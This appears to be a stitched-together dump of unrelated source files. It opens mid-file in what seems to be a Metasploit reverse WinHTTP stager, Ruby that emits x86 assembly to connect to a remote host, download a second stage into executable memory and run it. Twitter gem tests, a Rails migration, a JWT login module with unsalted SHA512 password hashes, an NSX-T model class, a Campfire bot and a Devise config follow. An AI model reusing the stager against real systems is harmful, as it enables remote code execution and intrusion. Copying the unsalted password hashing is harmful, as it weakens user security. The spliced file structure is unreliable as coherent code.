0x00000001 | # WINHTTP_AUTO_DETECT_TYPE_DHCP
0x00000002 ) # WINHTTP_AUTO_DETECT_TYPE_DNS_A
ie_proxy_flags = (
0x00000001 | # WINHTTP_AUTOPROXY_AUTO_DETECT
0x00000002 ) # WINHTTP_AUTOPROXY_CONFIG_URL
asm = %Q^
; Input: EBP must be the address of 'api_call'.
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_winhttp:
push 0x00707474 ; Push the string 'winhttp',0
push 0x686E6977 ; ...
push esp ; Push a pointer to the "winhttp" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "winhttp" )
^
if verify_ssl
asm << %Q^
load_crypt32:
push 0x00323374 ; Push the string 'crypt32',0
push 0x70797263 ; ...
push esp ; Push a pointer to the "crypt32" string
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
call ebp ; LoadLibraryA( "wincrypt" )
^
end
asm << %Q^
xor ebx, ebx
WinHttpOpen:
^
if proxy_enabled
asm << %Q^
push ebx ; Flags
push esp ; ProxyBypass ("")
call get_proxy_server
db #{proxy_info}
get_proxy_server:
; ProxyName (via call)
push 3 ; AccessType (NAMED_PROXY= 3)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
else
asm << %Q^
push ebx ; Flags
push ebx ; ProxyBypass (NULL)
push ebx ; ProxyName (NULL)
push ebx ; AccessType (DEFAULT_PROXY= 0)
push ebx ; UserAgent (NULL) [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')}
call ebp
^
end
if opts[:proxy_ie] == true && !proxy_enabled
asm << %Q^
push eax ; Session handle is required later for ie proxy
^
end
asm << %Q^
WinHttpConnect:
push ebx ; Reserved (NULL)
push #{opts[:port]} ; Port [3]
call got_server_uri ; Double call to get pointer for both server_uri and
server_uri: ; server_host; server_uri is saved in edi for later
^
if opts[:proxy_ie] == true && !proxy_enabled
asm << %Q^
db #{encoded_full_url}
got_server_host:
add edi, #{encoded_uri_index} ; move edi up to where the URI starts
^
else
asm << %Q^
db #{encoded_uri}
got_server_host:
^
end
asm << %Q^
push eax ; Session handle returned by WinHttpOpen
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')}
call ebp
WinHttpOpenRequest:
push 0x#{http_open_flags.to_s(16)}
push ebx ; AcceptTypes (NULL)
push ebx ; Referrer (NULL)
push ebx ; Version (NULL)
push edi ; ObjectName (URI)
push ebx ; Verb (GET method) (NULL)
push eax ; Connect handle returned by WinHttpConnect
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')}
call ebp
xchg esi, eax ; save HttpRequest handler in esi
^
if proxy_enabled && proxy_user
asm << %Q^
push ebx ; pAuthParams (NULL)
^
if proxy_pass
asm << %Q^
call got_proxy_pass ; put proxy_pass on the stack
proxy_pass:
db #{proxy_pass}
got_proxy_pass:
; pwszPassword now on the stack
^
else
asm << %Q^
push ebx ; pwszPassword (NULL)
^
end
asm << %Q^
call got_proxy_user ; put proxy_user on the stack
proxy_user:
db #{proxy_user}
got_proxy_user:
; pwszUserName now on the stack
push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1)
push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')}
call ebp
^
elsif opts[:proxy_ie] == true
asm << %Q^
; allocate space for WINHTTP_CURRENT_USER_IE_PROXY_CONFIG, which is
; a 16-byte structure
sub esp, 16
mov eax, esp ; store a pointer to the buffer
push edi ; store the current URL in case it's needed
mov edi, eax ; put the buffer pointer in edi
push edi ; Push a pointer to the buffer
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
jz ie_proxy_setup_finish
; we don't care about the "auto detect" flag, as it doesn't seem to
; impact us at all.
; if auto detect isn't on, check if there's an auto configuration URL
mov eax, [edi+4]
test eax, eax
jz ie_proxy_manual
; restore the URL we need to reference
pop edx
sub edx, #{encoded_uri_index} ; move edx up to where the full URL starts
; set up the autoproxy structure on the stack
push 1 ; fAutoLogonIfChallenged (1=TRUE)
push ebx ; dwReserved (0)
push ebx ; lpReserved (NULL)
push eax ; lpszAutoConfigUrl
push #{ie_proxy_autodect} ; dwAutoDetectFlags
push #{ie_proxy_flags} ; dwFlags
mov eax, esp
; prepare space for the resulting proxy info structure
sub esp, 12
mov edi, esp ; store the proxy pointer
; prepare the WinHttpGetProxyForUrl call
push edi ; pProxyInfo
push eax ; pAutoProxyOptions
push edx ; lpcwszUrl
lea eax, [esp+64] ; Find the pointer to the hSession - HACK!
push [eax] ; hSession
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')}
call ebp
test eax, eax ; skip the rest of the proxy stuff if the call failed
jz ie_proxy_setup_finish
jmp set_ie_proxy ; edi points to the filled out proxy structure
ie_proxy_manual:
; check to see if a manual proxy is specified, if not, we skip
mov eax, [edi+8]
test eax, eax
jz ie_proxy_setup_finish
; manual proxy present, set up the proxy info structure by patching the
; existing current user IE structure that is in edi
push 4
pop eax
add edi, eax ; skip over the fAutoDetect flag
dec eax
mov [edi], eax ; set dwAccessType (3=WINHTTP_ACCESS_TYPE_NAMED_PROXY)
; fallthrough to set the ie proxy
set_ie_proxy:
; we assume that edi is going to point to the proxy options
push 12 ; dwBufferLength (sizeof proxy options)
push edi ; lpBuffer (pointer to the proxy)
push 38 ; dwOption (WINHTTP_OPTION_PROXY)
push esi ; hRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
ie_proxy_setup_finish:
^
end
if opts[:ssl]
asm << %Q^
; WinHttpSetOption (hInternet, WINHTTP_OPTION_SECURITY_FLAGS, &buffer, sizeof(buffer) );
set_security_options:
push 0x#{secure_flags.to_s(16)}
mov eax, esp
push 4 ; sizeof(buffer)
push eax ; &buffer
push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')}
call ebp
^
end
asm << %Q^
; Store our retry counter in the edi register
set_retry:
push #{retry_count}
pop edi
send_request:
WinHttpSendRequest:
push ebx ; Context [7]
push ebx ; TotalLength [6]
push ebx ; OptionalLength (0) [5]
push ebx ; Optional (NULL) [4]
^
if custom_headers
asm << %Q^
push -1 ; dwHeadersLength (assume NULL terminated) [3]
call get_req_headers ; lpszHeaders (pointer to the custom headers) [2]
db #{custom_headers}
get_req_headers:
^
else
asm << %Q^
push ebx ; HeadersLength (0) [3]
push ebx ; Headers (NULL) [2]
^
end
asm << %Q^
push esi ; HttpRequest handle returned by WinHttpOpenRequest [1]
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')}
call ebp
test eax,eax
jnz check_response ; if TRUE call WinHttpReceiveResponse API
try_it_again:
dec edi
jnz send_request
; if we didn't allocate before running out of retries, fall through
^
if opts[:exitfunk]
asm << %Q^
failure:
call exitfunk
^
else
asm << %Q^
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
^
end
# Jump target if the request was sent successfully
asm << %Q^
check_response:
^
# Verify the SSL certificate hash
if verify_ssl
asm << %Q^
ssl_cert_get_context:
push 4
mov ecx, esp ; Allocate &bufferLength
push 0
mov ebx, esp ; Allocate &buffer (ebx will point to *pCert)
push ecx ; &bufferLength
push ebx ; &buffer
push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT)
push esi ; hHttpRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
; ebx
ssl_cert_allocate_hash_space:
push 20 ;
mov ecx, esp ; Store a reference to the address of 20
sub esp,[ecx] ; Allocate 20 bytes for the hash output
mov edi, esp ; edi will point to our buffer
ssl_cert_get_server_hash:
push ecx ; &bufferLength
push edi ; &buffer (20-byte SHA1 hash)
push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID)
push [ebx] ; *pCert
push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')}
call ebp
test eax, eax ;
jz failure ; Bail out if we couldn't get the certificate context
ssl_cert_start_verify:
call ssl_cert_compare_hashes
db #{encoded_cert_hash}
ssl_cert_compare_hashes:
pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert)
; edi points to the server-provided certificate hash
push 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times
pop ecx ;
mov edx, ecx ; Keep a reference to 4 in edx
ssl_cert_verify_compare_loop:
mov eax, [ebx] ; Grab the next DWORD of the hash
cmp eax, [edi] ; Compare with the server hash
jnz failure ; Bail out if the DWORD doesn't match
add ebx, edx ; Increment internal hash pointer by 4
add edi, edx ; Increment server hash pointer by 4
loop ssl_cert_verify_compare_loop
; Our certificate hash was valid, hurray!
ssl_cert_verify_cleanup:
xor ebx, ebx ; Reset ebx back to zero
^
end
asm << %Q^
receive_response:
; The API WinHttpReceiveResponse needs to be called
; first to get a valid handle for WinHttpReadData
push ebx ; Reserved (NULL)
push esi ; Request handler returned by WinHttpSendRequest
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')}
call ebp
test eax,eax
jz failure
allocate_memory:
push 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (4Mb ought to do us)
push ebx ; NULL as we dont care where the allocation is
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push ebx ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; NumberOfBytesRead (bytesRead)
push 8192 ; NumberOfBytesToRead
push ebx ; Buffer
push esi ; Request handler returned by WinHttpReceiveResponse
push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')}
call ebp
test eax,eax ; if download failed? (optional?)
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax ; optional?
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
got_server_uri:
pop edi
call got_server_host ; put the server_host on the stack (WinHttpConnect API [2])
server_host:
db #{encoded_host}
^
if opts[:exitfunk]
asm << asm_exitfunk(opts)
end
asm
end
end
end
| 33.314935 | 115 | 0.568658 |
8711f038b3f02e04c8d2e66433b0e004a8b8f48a | 2,755 | require 'helper'
describe Twitter::REST::API::Trends do
before do
@client = Twitter::REST::Client.new(:consumer_key => 'CK', :consumer_secret => 'CS', :access_token => 'AT', :access_token_secret => 'AS')
end
describe '#trends' do
context 'with woeid passed' do
before do
stub_get('/1.1/trends/place.json').with(:query => {:id => '2487956'}).to_return(:body => fixture('matching_trends.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends(2_487_956)
expect(a_get('/1.1/trends/place.json').with(:query => {:id => '2487956'})).to have_been_made
end
it 'returns the top 10 trending topics for a specific WOEID' do
matching_trends = @client.trends(2_487_956)
expect(matching_trends).to be_a Twitter::TrendResults
expect(matching_trends.first).to be_a Twitter::Trend
expect(matching_trends.first.name).to eq('#sevenwordsaftersex')
end
end
context 'without arguments passed' do
before do
stub_get('/1.1/trends/place.json').with(:query => {:id => '1'}).to_return(:body => fixture('matching_trends.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends
expect(a_get('/1.1/trends/place.json').with(:query => {:id => '1'})).to have_been_made
end
end
end
describe '#trends_available' do
before do
stub_get('/1.1/trends/available.json').to_return(:body => fixture('locations.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends_available
expect(a_get('/1.1/trends/available.json')).to have_been_made
end
it 'returns the locations that Twitter has trending topic information for' do
locations = @client.trends_available
expect(locations).to be_an Array
expect(locations.first).to be_a Twitter::Place
expect(locations.first.name).to eq('Ireland')
end
end
describe '#trends_closest' do
before do
stub_get('/1.1/trends/closest.json').to_return(:body => fixture('locations.json'), :headers => {:content_type => 'application/json; charset=utf-8'})
end
it 'requests the correct resource' do
@client.trends_closest
expect(a_get('/1.1/trends/closest.json')).to have_been_made
end
it 'returns the locations that Twitter has trending topic information for' do
locations = @client.trends_closest
expect(locations).to be_an Array
expect(locations.first).to be_a Twitter::Place
expect(locations.first.name).to eq('Ireland')
end
end
end
| 39.927536 | 195 | 0.665336 |
62d817379ab69edc8fc2d16f6b63076d4e5e5ee9 | 215 | class CreateProjects < ActiveRecord::Migration[6.1]
def change
create_table :projects do |t|
t.string :name
t.string :description
t.integer :location_id
t.timestamps
end
end
end
| 17.916667 | 51 | 0.660465 |
d50d6fae1ce5dcbd7ef342b61d12d7b1790bd295 | 1,781 | $secret = File.read 'secret.txt'
require 'digest'
require 'jwt'
def login(username, password)
password_hash = Digest::SHA512.digest password
password.gsub /./, ' '
rows = $db.execute('SELECT * FROM users WHERE username=? AND password_hash=? LIMIT 1;', [username, password_hash])
return false if rows.empty?
payload = { 'username' => username, 'random' => Random.rand }
JWT.encode payload, $secret, 'HS256'
end
def register(username, password)
return false unless $enable_register
return false unless $db.execute('SELECT * FROM users WHERE username=? LIMIT 1;', [username]).empty?
password_hash = Digest::SHA512.digest password
password.gsub /./, ' '
$db.execute('INSERT INTO users (username, password_hash) VALUES (?, ?);', [username, password_hash])
payload = { 'username' => username, 'random' => Random.rand }
JWT.encode payload, $secret, 'HS256'
end
def decode_token(token)
payload = JWT.decode token, $secret, true, { :algorithm => 'HS256' }
return payload[0]['username']
end
def valid_token?(token)
begin
username = decode_token(token)
rows = $db.execute('SELECT * FROM users WHERE username=? LIMIT 1;', [username])
if rows.empty? then return false else return username end
rescue JWT::VerificationError => e
return false
end
end
post '/auth/login' do
username = request[:username]
password = request[:password]
token = login(username, password)
return 403 unless token
{
'token' => token
}.to_json
end
post '/auth/register' do
username = request[:username]
password = request[:password]
token = register(username, password)
return 403 unless token
{
'token' => token
}.to_json
end
post '/auth/test' do
{
'username' => decode_token(request[:token])
}.to_json
end | 25.084507 | 116 | 0.68557 |
2877535165e53d7278e6f802feb7de9fdffbda12 | 14,156 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.17
=end
require 'date'
module NSXTPolicy
# Child wrapper object for IPSecVpnSession, used in hierarchical API.
class ChildIPSecVpnSession
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# The _revision property describes the current revision of the resource. To prevent clients from overwriting each other's changes, PUT operations must include the current _revision of the resource, which clients should obtain by issuing a GET operation. If the _revision provided in a PUT request is missing or stale, the operation will be rejected.
attr_accessor :_revision
# Indicates system owned resource
attr_accessor :_system_owned
# Defaults to ID if not set
attr_accessor :display_name
# Description of this resource
attr_accessor :description
# Opaque identifiers meaningful to the API user
attr_accessor :tags
# ID of the user who created this resource
attr_accessor :_create_user
# Protection status is one of the following: PROTECTED - the client who retrieved the entity is not allowed to modify it. NOT_PROTECTED - the client who retrieved the entity is allowed to modify it REQUIRE_OVERRIDE - the client who retrieved the entity is a super user and can modify it, but only when providing the request header X-Allow-Overwrite=true. UNKNOWN - the _protection field could not be determined for this entity.
attr_accessor :_protection
# Timestamp of resource creation
attr_accessor :_create_time
# Timestamp of last modification
attr_accessor :_last_modified_time
# ID of the user who last modified this resource
attr_accessor :_last_modified_user
# Unique identifier of this resource
attr_accessor :id
attr_accessor :resource_type
# Indicates whether this object is the overridden intent object Global intent objects cannot be modified by the user. However, certain global intent objects can be overridden locally by use of this property. In such cases, the overridden local values take precedence over the globally defined values for the properties.
attr_accessor :mark_for_override
# If this field is set to true, delete operation is triggered on the intent tree. This resource along with its all children in intent tree will be deleted. This is a cascade delete and should only be used if intent object along with its all children are to be deleted. This does not support deletion of single non-leaf node within the tree and should be used carefully.
attr_accessor :marked_for_delete
# Contains the actual IPSecVpnSession object.
attr_accessor :ip_sec_vpn_session
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'_revision' => :'_revision',
:'_system_owned' => :'_system_owned',
:'display_name' => :'display_name',
:'description' => :'description',
:'tags' => :'tags',
:'_create_user' => :'_create_user',
:'_protection' => :'_protection',
:'_create_time' => :'_create_time',
:'_last_modified_time' => :'_last_modified_time',
:'_last_modified_user' => :'_last_modified_user',
:'id' => :'id',
:'resource_type' => :'resource_type',
:'mark_for_override' => :'mark_for_override',
:'marked_for_delete' => :'marked_for_delete',
:'ip_sec_vpn_session' => :'IPSecVpnSession'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'_revision' => :'Integer',
:'_system_owned' => :'BOOLEAN',
:'display_name' => :'String',
:'description' => :'String',
:'tags' => :'Array<Tag>',
:'_create_user' => :'String',
:'_protection' => :'String',
:'_create_time' => :'Integer',
:'_last_modified_time' => :'Integer',
:'_last_modified_user' => :'String',
:'id' => :'String',
:'resource_type' => :'String',
:'mark_for_override' => :'BOOLEAN',
:'marked_for_delete' => :'BOOLEAN',
:'ip_sec_vpn_session' => :'IPSecVpnSession'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'_revision')
self._revision = attributes[:'_revision']
end
if attributes.has_key?(:'_system_owned')
self._system_owned = attributes[:'_system_owned']
end
if attributes.has_key?(:'display_name')
self.display_name = attributes[:'display_name']
end
if attributes.has_key?(:'description')
self.description = attributes[:'description']
end
if attributes.has_key?(:'tags')
if (value = attributes[:'tags']).is_a?(Array)
self.tags = value
end
end
if attributes.has_key?(:'_create_user')
self._create_user = attributes[:'_create_user']
end
if attributes.has_key?(:'_protection')
self._protection = attributes[:'_protection']
end
if attributes.has_key?(:'_create_time')
self._create_time = attributes[:'_create_time']
end
if attributes.has_key?(:'_last_modified_time')
self._last_modified_time = attributes[:'_last_modified_time']
end
if attributes.has_key?(:'_last_modified_user')
self._last_modified_user = attributes[:'_last_modified_user']
end
if attributes.has_key?(:'id')
self.id = attributes[:'id']
end
if attributes.has_key?(:'resource_type')
self.resource_type = attributes[:'resource_type']
end
if attributes.has_key?(:'mark_for_override')
self.mark_for_override = attributes[:'mark_for_override']
else
self.mark_for_override = false
end
if attributes.has_key?(:'marked_for_delete')
self.marked_for_delete = attributes[:'marked_for_delete']
else
self.marked_for_delete = false
end
if attributes.has_key?(:'IPSecVpnSession')
self.ip_sec_vpn_session = attributes[:'IPSecVpnSession']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if !@display_name.nil? && @display_name.to_s.length > 255
invalid_properties.push('invalid value for "display_name", the character length must be smaller than or equal to 255.')
end
if [email protected]? && @description.to_s.length > 1024
invalid_properties.push('invalid value for "description", the character length must be smaller than or equal to 1024.')
end
if @resource_type.nil?
invalid_properties.push('invalid value for "resource_type", resource_type cannot be nil.')
end
if @ip_sec_vpn_session.nil?
invalid_properties.push('invalid value for "ip_sec_vpn_session", ip_sec_vpn_session cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if !@display_name.nil? && @display_name.to_s.length > 255
return false if [email protected]? && @description.to_s.length > 1024
return false if @resource_type.nil?
return false if @ip_sec_vpn_session.nil?
true
end
# Custom attribute writer method with validation
# @param [Object] display_name Value to be assigned
def display_name=(display_name)
if !display_name.nil? && display_name.to_s.length > 255
fail ArgumentError, 'invalid value for "display_name", the character length must be smaller than or equal to 255.'
end
@display_name = display_name
end
# Custom attribute writer method with validation
# @param [Object] description Value to be assigned
def description=(description)
if !description.nil? && description.to_s.length > 1024
fail ArgumentError, 'invalid value for "description", the character length must be smaller than or equal to 1024.'
end
@description = description
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
_revision == o._revision &&
_system_owned == o._system_owned &&
display_name == o.display_name &&
description == o.description &&
tags == o.tags &&
_create_user == o._create_user &&
_protection == o._protection &&
_create_time == o._create_time &&
_last_modified_time == o._last_modified_time &&
_last_modified_user == o._last_modified_user &&
id == o.id &&
resource_type == o.resource_type &&
mark_for_override == o.mark_for_override &&
marked_for_delete == o.marked_for_delete &&
ip_sec_vpn_session == o.ip_sec_vpn_session
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, _revision, _system_owned, display_name, description, tags, _create_user, _protection, _create_time, _last_modified_time, _last_modified_user, id, resource_type, mark_for_override, marked_for_delete, ip_sec_vpn_session].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 35.039604 | 508 | 0.645097 |
ed5e76cd86f601399728799707ead16fb8e864d3 | 1,622 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other_user = users(:archer)
end
test "should redirect edit when not logged in" do
get edit_user_path(@user)
assert_not flash.empty?
assert_redirected_to login_url
end
test "should redirect index when not logged in" do
get users_path
assert_redirected_to login_url
end
test "should redirect update when not logged in" do
patch user_path(@user), params: {user: {name: @user.name,
email: @user.email}}
assert_not flash.empty?
assert_redirected_to login_url
end
test "should get new" do
get signup_path
assert_response :success
end
test "should not allow the admin attribute to be edited via the web" do
log_in_as(@other_user)
assert_not @other_user.admin?
patch user_path(@other_user), params: {
user: {password: @other_user.password,
password_confirmation: @other_user.password,
admin: true}}
assert_not @other_user.reload.admin?
end
test "should redirect destroy when not logged in" do
assert_no_difference "User.count" do
delete user_path(@user)
end
assert_redirected_to login_url
end
test "should redirect destroy when logged in as a non-admin" do
log_in_as(@other_user)
assert_no_difference "User.count" do
delete user_path(@user)
end
assert_redirected_to root_url
end
end
| 27.491525 | 87 | 0.644266 |
38935dc667eaaf36613a9c0ea2b81c3245825676 | 3,594 | class Campfire < Linkbot::Connector
Linkbot::Connector.register('campfire', self)
def initialize(options)
super(options)
end
def start
request_options = {
:head => {
'authorization' => [@options['username'], @options['password']],
'Content-Type' => 'application/json'
}
}
user_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/users/me.json").get request_options
user_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble logging in." }
user_http.callback {
@user = JSON.parse(user_http.response)["user"]
request_options[:head]['authorization'] = [@user["api_auth_token"],"x"]
request_options[:body] = "_"
join_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/room/#{@options["room"]}/join.xml").post request_options
join_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble entering the room." }
join_http.callback {
listen
}
}
end
def listen
options = {
:path => "/room/#{@options["room"]}/live.json",
:host => "streaming.campfirenow.com",
:auth => "#{@user["api_auth_token"]}:x",
:timeout => 6
}
stream = Twitter::JSONStream.connect(options)
stream.each_item do |item|
process_message(item)
end
stream.on_error do |message|
Linkbot.log.error "Campfire connector: #{message.inspect}"
end
stream.on_max_reconnects do |timeout, retries|
Linkbot.log.fatal "Campire connector: tried #{retries} times to connect."
exit
end
end
def process_message(item)
message = JSON.parse(item)
if message['type'] == 'TextMessage' && message['user_id'] != @user["id"]
# Check if the user who is sending this message exists in the DB yet - if not, load the users details before
# processing the message
if Linkbot.user_exists?(message['user_id'])
# Build the message
message = Message.new( message['body'], message['user_id'], Linkbot.user_ids[message['user_id']], self, :message, {} )
invoke_callbacks(message)
else
# Fetch the user data from campfire, then process the callbacks
request_options = {
:head => {
'authorization' => [@user['api_auth_token'], "x"],
'Content-Type' => 'application/json'
}
}
user_http = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/users/#{message['user_id']}.json").get request_options
user_http.errback { Linkbot.log.error "Campfire connector: Yeah trouble entering the room." }
user_http.callback {
user = JSON.parse(user_http.response)["user"]
Linkbot.add_user(user["name"],user["id"])
message = Message.new( message['body'], message['user_id'], Linkbot.user_ids[message['user_id']], self, :message, {} )
invoke_callbacks(message)
}
end
end
end
def send_messages(messages,options = {})
flattened_messages = []
messages.each {|m| flattened_messages = flattened_messages + m.split("\n")}
flattened_messages.each_with_index do |m,i|
next if m.strip.empty?
request_options = {
:head => {
'authorization' => [@user["api_auth_token"],"x"],
'Content-Type' => 'application/json'
},
:body => {'message' => {'body' => m, 'type' => "TextMessage"}}.to_json
}
request = EventMachine::HttpRequest.new("#{@options["campfire_url"]}/room/#{@options['room']}/speak.json").post request_options
end
end
end
| 33.90566 | 133 | 0.622983 |
7999327130a34b9cebbf32bdef620fc022a9c751 | 733 | class CatalogCulture < ActiveRecord::Base
# specify schema and table name
self.table_name = :cultures
# specify primary key name
self.primary_key = :id
# override decimal set
set_integer_columns :id, :mkey
ignore_columns :step, :record_view, :area, :period,
:attrib_type, :attributor, :attrib_date,
:attrib_source, :attrib_comment, :certainty, :note
custom_attribute :catalog_id, :mkey
custom_attribute :sort, :step
custom_attribute :attribution_type, :attrib_type
custom_attribute :attribution_date, :attrib_date
custom_attribute :attribution_comment, :attrib_comment
custom_attribute :attribution_source, :attrib_source
categorical :culture
belongs_to :catalog, foreign_key: "mkey"
end | 29.32 | 56 | 0.768076 |
614a447771db2b961a00cc2cc56f7eaf8530af29 | 50 | include_recipe 'gusztavvargadr_octopus::tentacle'
| 25 | 49 | 0.88 |
182ca84a10205b6191ffd7b8eef64870bbcd1c19 | 13,642 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '902b3c7b46476bcd971c67694d88ab290a0dba3377b65c44fcc22c00bea617c5b0bb8df17197b825ca621fe930dfb684be84b195677c02a116380426ce4115f6'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
